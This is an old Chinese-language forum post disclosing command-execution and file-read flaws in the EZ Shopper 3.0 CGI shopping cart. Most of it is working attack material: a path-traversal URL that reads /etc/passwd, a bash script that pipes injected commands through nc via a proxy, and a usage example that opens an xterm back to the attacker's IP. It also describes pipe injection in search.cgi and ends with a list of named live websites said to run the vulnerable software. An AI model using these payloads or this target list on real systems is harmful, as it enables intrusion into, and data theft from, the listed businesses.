精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>EZ Shopper 3.0购物车CGI程序可远程执行

主题:EZ Shopper 3.0购物车CGI程序可远程执行
发信人: netcc()
整理人: (2000-03-06 23:36:46), 站内信件

影响系统:  EZ Shopper 3.0 
平台:     Unix, NT
类型: CGI输入检测问题

漏洞简介:

任何人都可以以web服务器运行身份在远程执行任意命令,可以读取web服务器文
件。
  这个perl程序没有对输入进行有效的检测,用open()函数来执行用户提交的信
息。

漏洞检测说明:

(1) loadpage.cgi (可以用来查看任意文件)
首先用浏览器找到当前路径,如:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
这时可能会返回一个错误信息:
Cannot open file /home/www/shop/XYZ 
现在可以替换为下面的格式,如:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径
>/<文件名>
具体如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/
passwd

(2) loadpage.cgi (执行任意以web身份运行的命令)

利用下面脚本可以通过代理,借助netcat间接与服务器进行连接,脚本如下:

该脚本例如命名为ezshophack.sh
---------------------------------------------------

#!/bin/bash
echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&fi
le=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

---------------------------------------------------

用法如下:
$ ./ezshophack.sh /usr/X11R6/bin/xterm%20-display%20你的IP地址:0
具体如下,假如你的IP为100.100.100.100:
$ ./ezshophack.sh /usr/X11R6/bin/xterm%20-display%20100.100.100.100:0


(3) search.cgi - (查看文件和执行命令)

用管道命令替换数据库字段或者path/filename。
http://www.example.com/cgi-bin/search.cgi?user_id=1&database=<输入任意
信息>&template=<输入任意信息>&distinct=1

采用的该系统的服务器有,可以去altavista搜索。
floralstuff.com, amazinggates.com, onlinetraders.com, riccardosmarket.
com, xstitches.com, 
search4u.org , jojomamanbebe.co.uk, armysurplus.com, cheddarbox.com, f
leamarketbooks.com, 
framer.com, hkmusic.com, battenburg-lace-shirts.com, teamdawg.com , mu
seek.net,
 music123.com, candlesdelight.com, harvest.org, robertsliardon.org, or
ganicstoyou.com, 
classic-collectibles.com, finestkind.net, partytimesaver.com, kkorigin
als.com, blackmetal.com 

--
      我思念的城市已是黄昏,为何我总是对你一网情深!

※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.201]

[关闭][返回]